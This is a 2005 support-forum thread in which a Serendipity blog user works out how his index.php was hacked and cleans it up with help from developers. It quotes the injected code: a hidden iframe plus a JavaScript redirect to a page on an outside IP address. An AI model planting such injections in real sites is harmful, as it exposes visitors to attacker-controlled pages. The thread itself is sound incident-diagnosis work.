Serendipity Forums

User and developer community
https://board.s9y.org/

Blog hacked

https://board.s9y.org/viewtopic.php?t=1385

Page 1 of 1

Blog hacked

Posted: Fri Apr 01, 2005 12:16 am
by rolli
Hi,

when i have a look at my CoWriters Testblog i noticed, that it was hacked. I dont now the reason why.

If you want to have a look at my hacked blog:

http://www.bibi-rolli.de/blog101/

Can anybody help me, the database seams to be clear ...

Best wishes,

Rolli

Posted: Fri Apr 01, 2005 3:48 am
by tadpole
Looks like they just inserted a few lines at the beginning of the index.php file. Delete them. An iframe and a script element, it looks like.

As far as why, it probably wasn't serendipity that they got in through.

Could Be Anything...

Posted: Fri Apr 01, 2005 9:37 am
by ionic
You are running quite a lot of other applications...

Like a TRIAL version of Invision Power Board...

Of course you can drop a mail to phpaudit@suspekt.org and get an audit of your server for a fee ;)

Posted: Fri Apr 01, 2005 9:42 am
by Rolli
In the morning i have had a further look and you are right, this is the code:

<IFRAME style="WIDTH: 1125px; HEIGHT: 1000px" marginWidth=0 marginHeight=0 src="http://217.13.198.251/avs/newdir1/stoorm.html" frameBorder=0 width=150 scrolling=no height=185> </IFRAME>

Code: Select all

<script LANGUAGE="JavaScript">

    setTimeout("window.location='http://217.13.198.251/avs/newdir1/stoorm.html'",15000); 

    // delai d'attente en ms

</script>



<?php # $Id: index.php,v 1.77 2005/03/02 09:58:33 garvinhicking Exp $
but i think it must be a problem of the blog, my second testblok with another (different ) user is hacked also in the same way. the rest of my server is pretty well ....

Posted: Fri Apr 01, 2005 10:20 am
by rolli
UPDATE

After deleting the iframes at the begin and the end of the index.php the blog works ok. I have checked my server twice for other intrusion and hacking, but anything is ok ... the hacker yust hacked my two testboards and nothing else ....

Posted: Fri Apr 01, 2005 10:52 am
by garvinhicking
The thing is this: The attacker cannot have inserted the code if he didn't have file access to index.php

Check the permissions of index.php - if the file is only writable by your FTP user and not nobody (aka webserver) then it means your FTP account got hacked.

There would be no way how serendipity could overwrite the index.php from only within the application.

Regards,
Garvin
All times are UTC+02:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited